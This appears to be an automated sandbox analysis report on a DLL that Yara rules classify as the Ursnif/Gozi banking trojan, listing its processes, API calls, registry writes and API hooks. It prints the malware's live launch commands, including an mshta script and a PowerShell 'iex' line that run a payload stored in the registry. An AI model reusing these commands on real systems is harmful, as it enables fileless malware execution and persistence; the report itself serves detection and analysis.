Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff	1_2_02B75ECA

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.347644155.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347681136.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.368377859.000000000510B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347573362.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347619571.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347469685.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347515510.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347664803.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347704274.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4496, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, type: MEMORY

Matched rule: Win32.Gozi Author: CCN-CERT

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00401AD1 NtMapViewOfSection,	1_2_00401AD1
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00401C22 GetProcAddress,NtCreateSection,memset,	1_2_00401C22
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004023C5 NtQueryVirtualMemory,	1_2_004023C5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B87AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	1_2_02B87AFF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B7A027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	1_2_02B7A027
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B77E14 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	1_2_02B77E14
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B86CBC GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	1_2_02B86CBC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8AC94 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	1_2_02B8AC94
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B7ACD5 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	1_2_02B7ACD5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8CD7A NtQueryInformationProcess,	1_2_02B8CD7A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B7AA15 NtQuerySystemInformation,RtlNtStatusToDosError,	1_2_02B7AA15
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B840A7 memset,NtQueryInformationProcess,	1_2_02B840A7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B77878 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	1_2_02B77878
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B9298D memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	1_2_02B9298D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B81606 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_02B81606
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B737E7 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_02B737E7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B84C67 NtGetContextThread,RtlNtStatusToDosError,	1_2_02B84C67
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B79DAC NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	1_2_02B79DAC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B745FF OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	1_2_02B745FF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8956E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	1_2_02B8956E

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B79781 CreateProcessAsUserW,

1_2_02B79781

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_004021A4	1_2_004021A4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B762FA	1_2_02B762FA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B7E384	1_2_02B7E384
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B88BF3	1_2_02B88BF3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B848AD	1_2_02B848AD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B7D0DC	1_2_02B7D0DC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8D057	1_2_02B8D057
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B97188	1_2_02B97188
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B93EAF	1_2_02B93EAF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8D7BD	1_2_02B8D7BD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B74C03	1_2_02B74C03
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8ED4B	1_2_02B8ED4B

Source: oywbpzxb.dll.31.dr	Static PE information: No import functions for PE file found
Source: augdh01w.dll.36.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: sup11_dump.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, type: MEMORY

Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html

Source: classification engine

Classification label: mal100.bank.troj.evad.winDLL@31/158@17/3

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B7A7B1 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,

1_2_02B7A7B1

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E9735B9C-6051-11EB-90E6-ECF4BB82F7E0}.dat

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D63034A3-3DB2-784E-776A-C12C9B3E8520}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{EA68EA5E-4183-AC83-1BBE-05A07FD209D4}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5064:120:WilError_01

Source: C:\Program Files\internet explorer\iexplore.exe

File created: C:\Users\user~1\AppData\Local\Temp\~DF2DD4708DD02ECB8C.TMP

Jump to behavior

Source: sup11_dump.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: sup11_dump.dll

Virustotal: Detection: 45%

Source: regsvr32.exe

String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\sup11_dump.dll'
Source: unknown	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\sup11_dump.dll
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'
Source: unknown	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17410 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82962 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17422 /prefetch:2
Source: unknown	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82978 /prefetch:2
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES3C64.tmp' 'c:\Users\user\AppData\Local\Temp\oywbpzxb\CSC2DF1E538346248FC93F32E43C7FD9A69.TMP'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES4E84.tmp' 'c:\Users\user\AppData\Local\Temp\augdh01w\CSCB69F8509801B4EEB877EE395DFB169E8.TMP'
Source: unknown	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: unknown	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\sup11_dump.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17410 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82962 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:17422 /prefetch:2	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3104 CREDAT:82978 /prefetch:2	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES3C64.tmp' 'c:\Users\user\AppData\Local\Temp\oywbpzxb\CSC2DF1E538346248FC93F32E43C7FD9A69.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES4E84.tmp' 'c:\Users\user\AppData\Local\Temp\augdh01w\CSCB69F8509801B4EEB877EE395DFB169E8.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:	Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001F.00000002.419574555.000001D4F2870000.00000002.00000001.sdmp, csc.exe, 00000024.00000002.428776969.0000026A53A00000.00000002.00000001.sdmp
Source:	Binary string: ntdll.pdb source: regsvr32.exe, 00000001.00000003.439250329.0000000005B00000.00000004.00000001.sdmp
Source:	Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000001.00000003.439250329.0000000005B00000.00000004.00000001.sdmp

Data Obfuscation:

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))

Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline'
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline'

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B75BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_02B75BD5

Source: unknown

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\sup11_dump.dll

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00402140 push ecx; ret	1_2_00402149
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_00402193 push ecx; ret	1_2_004021A3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B97177 push ecx; ret	1_2_02B97187
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B96E10 push ecx; ret	1_2_02B96E19

Persistence and Installation Behavior:

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.347644155.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347681136.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.368377859.000000000510B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347573362.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347619571.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347469685.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347515510.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347664803.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347704274.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4496, type: MEMORY

Hooks registry keys query functions (used to hide registry keys)

Show sources

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW

Modifies the export address table of user mode modules (user mode EAT hooks)

Show sources

Source: explorer.exe

IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFFAC2D521C

Modifies the import address table of user mode modules (user mode IAT hooks)

Show sources

Source: explorer.exe

EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFFAC2D5200

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00

Source: C:\Windows\SysWOW64\regsvr32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
